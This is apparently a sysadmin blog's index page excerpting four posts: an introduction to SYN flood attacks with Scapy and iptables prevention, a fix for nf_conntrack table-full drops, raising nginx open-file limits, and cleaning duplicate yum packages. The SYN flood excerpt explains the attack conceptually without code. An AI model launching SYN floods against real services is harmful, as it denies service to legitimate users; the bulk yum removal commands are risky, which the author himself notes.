Thứ Ba, 24 tháng 10, 2017

SYN Flooding using SCAPY and Prevention using iptables

DoS (Denial of Service) attacks against Web services make them unavailable for legitimate users, affecting the website owner’s potential business. These involve intentional consumption of network, CPU and memory resources. In this article, I will demonstrate how to do a SYN flood using the SCAPY framework, along with other preventive measures.
Over time, DoS attacks have become more complicated, concealing malicious client requests as legitimate ones. Also, a distributed approach, the DDoS (Distributed Denial of Service) is now being adopted, which involves generating multiple requests to create a flood scenario. One type of DDoS flood attack is the TCP SYN queue flood.
A SYN queue flood attack takes advantage of the TCP protocol’s “three-way handshake”. A client sends a TCP SYN (S flag) packet to begin a connection to the server. The target server replies with a TCP SYN-ACK (SA flag) packet, but the client does not respond to the SYN-ACK, leaving the TCP connection “half-open”. In normal operation, the client should send an ACK (a flag) packet followed by the data to be transferred, or an RST reply to reset the connection. On the target server, the connection is kept open, in a “SYN_RECV” state, as the ACK packet may have been lost due to network problems.

Thứ Hai, 23 tháng 10, 2017

How to Fix Nf_conntrack Table Full Dropping Packet

Issue

Packet drops on this system for connections using ip_conntrack or nf_conntrack. Following messages seen in /var/log/kern on the centos nodes when one of the instances drops packets:
$ tail -f /var/log/kern
Jul  4 03:47:16 centos kernel: : nf_conntrack: table full, dropping packet
Jul  4 03:47:16 centos kernel: : nf_conntrack: table full, dropping packet
This can happen when you are being attacked, or is also very likely to happen on a busy server even if there is no malicious activity.
NOTE: By default, CentOS will set this maximum to 65,536 connections. This is enough for lightly loaded servers, but can easily be exhausted on heavy traffic servers.

How to Fix

Chủ Nhật, 22 tháng 10, 2017

Nginx: 24: Too Many Open Files Error And Solution

How do I fix this problem under CentOS / RHEL / Fedora Linux or UNIX like operating systems?

Linux / UNIX sets soft and hard limit for the number of file handles and open files. You can use ulimit command to view those limitations:
su - nginx
To see the hard and soft values, issue the command as follows:
ulimit -Hn
ulimit -Sn

Increase Open FD Limit at Linux OS Level

Your operating system set limits on how many files can be opened by nginx server. You can easily fix this problem by setting or increasing system open file limits under Linux. Edit file /etc/sysctl.conf, enter:
# vi /etc/sysctl.conf
Append / modify the following line:
fs.file-max = 70000
Save and close the file. Edit /etc/security/limits.conf, enter:
# vi /etc/security/limits.conf
Set soft and hard limit for all users or nginx user as follows:
nginx       soft    nofile   10000
nginx       hard    nofile  30000
Save and close the file. Finally, reload the changes with sysctl command:
# sysctl -p

Chủ Nhật, 15 tháng 10, 2017

yum, rpm and duplicate versions

Apparently, when doing "yum update", and it fails miserably, you can end up with duplicate versions of packages in the RPM database. This seems harmless, but is annoying. yum provides a tool to check for this, but I was not able to find anything that would automatically repair it. So here's a little tip:
$ yum check duplicates | awk '/is a duplicate/ {print $6}' > /tmp/DUPES
$ yum remove `cat /tmp/DUPES`
 Of course, before you remove the dupes, make sure to examine the tmp file (/tmp/DUPES) and make sure it looks ok.
Update:
There seems to be a command to do this, package-cleanup has an option for it. E.g.
$ package-cleanup --cleandupes
However, testing this command on a second box having the same problem gave bad results, it seems to have uninstalled the "real" packages too.